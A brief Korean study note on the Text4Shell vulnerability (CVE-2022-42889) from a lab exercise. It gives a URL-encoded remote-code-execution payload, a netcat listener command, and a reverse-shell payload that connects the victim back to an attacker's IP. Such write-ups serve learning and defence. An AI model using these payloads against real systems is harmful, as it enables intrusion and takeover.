2022.10.29
원데이 취약점 분석 스터디
CVE-2022–42889
(Text4Shell)
https://infosecwriteups.com/text4shell-poc-cve-2022-42889-f6e9df41b3b7
위의 사이트를 따라 text4shell 취약점 트리거를 위한 환경을 구성하고 나면,
검색 부분에 임의의 텍스트를 넣을 수 있다.
이때 텍스트 부분에서 Text4Shell 취약점이 발생하게 된다.
search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec(%27touch%20%2Ftmp%2Ftest%27%29%7D
와 같은 페이로드를 전송한다면, 희생자의 docker 에 /tmp/test 가 생성된다.
이를 통해서 RCE 가 가능하다는 것을 알 수 있다.
RCE가 가능하다면, 리버스 셸 공격도 가능하다.
공격자의 환경에서
rlwrap nc -nlvp (포트)
를 실행시켜 netcat을 이용해 리스닝 시킨 후,
search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec(%27nc%20(IP주소)%20(포트)%20-e%20%2Fbin%2Fbash%27%29%7D
와 같은 페이로드를 전송한다면,
공격자의 환경에 희생자의 셸을 얻게 된다.